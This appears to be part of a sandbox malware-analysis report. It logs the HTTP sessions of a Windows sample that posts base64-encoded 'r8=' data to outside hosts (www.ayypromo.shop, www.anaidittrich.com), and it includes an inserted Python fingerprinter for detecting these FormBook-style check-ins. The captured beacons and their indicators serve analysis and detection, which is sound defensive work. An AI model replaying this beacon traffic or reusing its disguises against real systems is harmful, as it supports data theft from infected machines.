                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:18.742995024 CEST | 1224 | IN
                                        Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.2.4 | 49766 | 176.57.64.102 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:32.203926086 CEST | 746 | OUT | POST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Ascii: r8=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
                                        Sep 3, 2024 13:55:32.808111906 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=65GLpdxqIKUfNDXLufSr; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:32 GMT
                                        Date: Tue, 03 Sep 2024 11:55:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 738
                                        Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                                        ETag: "2e2-620a674a57ae6"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.2.4 | 49767 | 176.57.64.102 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:34.755059958 CEST | 766 | OUT | POST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                                        Data Ascii: r8=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
                                        Sep 3, 2024 13:55:35.408145905 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=DUVd7I6PGCsU5C6IHULx; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:35 GMT
                                        Date: Tue, 03 Sep 2024 11:55:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        31 | 192.168.2.4 | 49768 | 176.57.64.102 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:37.298063993 CEST | 10848 | OUT | POST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 55 71 [TRUNCATED]
                                        Data Ascii: r8=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnbNw2PcvXr5/853DhYfB7xNkj9oHHjElCweHYo+ME+xMhmxaR63MJ36kUqht80gRvsxAEICgHEmCJt7d076bpVUxulBXTfrt4H+HCypUTCqBiX8PhUghK9O1KGSPrkFhof90ZZfm9LS2JxYhaftU8gCMjIr39Uq [TRUNCATED]
                                        Sep 3, 2024 13:55:38.206471920 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=b79WM5bSCFzaMTgsLNad; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:37 GMT
                                        Date: Tue, 03 Sep 2024 11:55:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        32 | 192.168.2.4 | 49769 | 176.57.64.102 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:39.842088938 CEST | 483 | OUT | GET /rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:40.610522032 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=L4d9MHzEOK0iFyOaxbUN; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:40 GMT
                                        Date: Tue, 03 Sep 2024 11:55:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
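
Added example (not part of this Joe Sandbox report): a small Python fingerprinter for the check-in pattern visible in sessions 30 to 34. Both hosts answered with ordinary 404 pages (a Tilda placeholder, a WordPress "Seite wurde nicht gefunden" page), so the responses carry no signal; everything useful is in the requests: a short alphanumeric path reused for every request to a host (/rgqx/, /qpwk/), Origin and Referer that point back at that same host and path, a form body with a single two-character key (r8) whose value is raw base64 with "+", "/" and the trailing "=" left unescaped, a GET whose query carries two two-character keys (r8, VZ), and one fixed Android tablet User-Agent sent by a Windows process to every host. The path-length band, the verdict thresholds, the trimmed header set and the benign control request (shop.example.test) are this example's assumptions, not something the report states; the r8 and VZ values are the ones captured above.

```python
"""Fingerprint FormBook-style HTTP check-ins in captured requests (added example, not report code).
Heuristics are read off sessions 30-34 above; thresholds and the benign control are assumptions."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # raw base64 alphabet, nothing percent-encoded
PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")        # /rgqx/, /qpwk/ (length band is an assumption)
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) "
      "AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36")

@dataclass
class Request:
    method: str
    path: str
    query: str
    headers: dict
    body: str

def parse_request(raw: str) -> Request:
    """Parse request text as the sandbox prints it: request line, headers, blank line, body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return Request(method, path, query, headers, body.strip())

def split_form(data: str) -> list:
    """k=v&k=v split WITHOUT urllib's '+'-to-space decoding: FormBook leaves '+', '/' and the
    trailing '=' of its base64 value unescaped, which a browser form post would percent-encode."""
    return [(p.partition("=")[0], p.partition("=")[2]) for p in data.split("&") if p]

def request_traits(req: Request) -> set:
    """Indicators visible in a single request (self-referential Origin/Referer alone is normal)."""
    traits, host = set(), req.headers.get("host", "")
    if PATH_RE.match(req.path):
        traits.add("short-alnum-path")
    params = split_form(req.body if req.method == "POST" else req.query)
    if req.method == "POST" and len(params) == 1 and len(params[0][0]) == 2 and B64_RE.match(params[0][1]):
        traits.add("single-2char-key-raw-b64-body")
    if req.method == "GET" and len(params) == 2 and all(len(k) == 2 and B64_RE.match(v) for k, v in params):
        traits.add("two-2char-key-query")
    origin, referer = urlsplit(req.headers.get("origin", "")), urlsplit(req.headers.get("referer", ""))
    if host and origin.netloc == host and referer.netloc == host and referer.path == req.path:
        traits.add("self-referential-origin-referer")
    ua = req.headers.get("user-agent", "")
    if "Android" in ua and "Windows" not in ua:
        traits.add("mobile-ua")  # sent by a Windows PE per the report: platform mismatch
    return traits

def fleet_traits(reqs: list) -> set:
    """Indicators that only show across sessions from the same process."""
    hosts = {r.headers.get("host") for r in reqs}
    uas = {r.headers.get("user-agent") for r in reqs}
    return {"fixed-ua-across-hosts"} if len(uas) == 1 and len(hosts) >= 2 else set()

def is_formbook_like(reqs: list) -> bool:
    """Conservative verdict (thresholds assumed): structural traits on every request, the encoded
    payload on at least one, and one UA string reused against several hosts."""
    per = [request_traits(r) for r in reqs]
    core = {"short-alnum-path", "self-referential-origin-referer"}
    payload = {"single-2char-key-raw-b64-body", "two-2char-key-query"}
    return (all(core <= t for t in per) and any(t & payload for t in per)
            and "fixed-ua-across-hosts" in fleet_traits(reqs))

def _req(method: str, host: str, target: str, body: str = "") -> str:
    """Builds request text with the headers the checks use (the report carries a few more)."""
    path = target.partition("?")[0]
    head = (f"{method} {target} HTTP/1.1\nHost: {host}\nOrigin: http://{host}\n"
            f"Referer: http://{host}{path}\nConnection: close\nUser-Agent: {UA}\n")
    if body:
        head += f"Content-Type: application/x-www-form-urlencoded\nContent-Length: {len(body)}\n"
    return head + "\n" + body

# Constructed from sessions 30, 32 and 33 of this report; the r8/VZ values are the captured ones.
CAPTURED = [
    _req("POST", "www.ayypromo.shop", "/rgqx/", "r8=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU="),
    _req("GET", "www.ayypromo.shop", "/rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28"),
    _req("POST", "www.anaidittrich.com", "/qpwk/", "r8=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8ZdrrmDLU9CYp9wRapX2ih9WClOiRra4XsaLjw=="),
]
# Constructed benign control: an ordinary percent-encoded browser form post with a Windows UA.
BENIGN = ["POST /account/login HTTP/1.1\nHost: shop.example.test\nOrigin: http://shop.example.test\n"
          "Referer: http://shop.example.test/account/login\nConnection: keep-alive\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0\n"
          "Content-Type: application/x-www-form-urlencoded\n\nuser=alice&pw=s3cret%2B1&remember=on"]

if __name__ == "__main__":
    captured = [parse_request(r) for r in CAPTURED]
    for r in captured:
        print(r.method, r.headers["host"], r.path, sorted(request_traits(r)))
    print("formbook-like:", is_formbook_like(captured))                       # True
    print("benign:", is_formbook_like([parse_request(r) for r in BENIGN]))  # False
```

Run it as a script to see the per-request traits. The hostnames are the least stable part of this pattern (two different ones already appear in this section, each answering 404), so a proxy-log or IDS rule keyed on the fixed User-Agent string together with the single-key r8 form body travels better than one keyed on domains.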


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        33 | 192.168.2.4 | 49770 | 162.55.254.209 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:45.687086105 CEST | 755 | OUT | POST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 6d 44 4c 55 39 43 59 70 39 77 52 61 70 58 32 69 68 39 57 43 6c 4f 69 52 72 61 34 58 73 61 4c 6a 77 3d 3d
                                        Data Ascii: r8=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8ZdrrmDLU9CYp9wRapX2ih9WClOiRra4XsaLjw==
                                        Sep 3, 2024 13:55:46.366858959 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:46 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:46.366880894 CEST | 1236 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
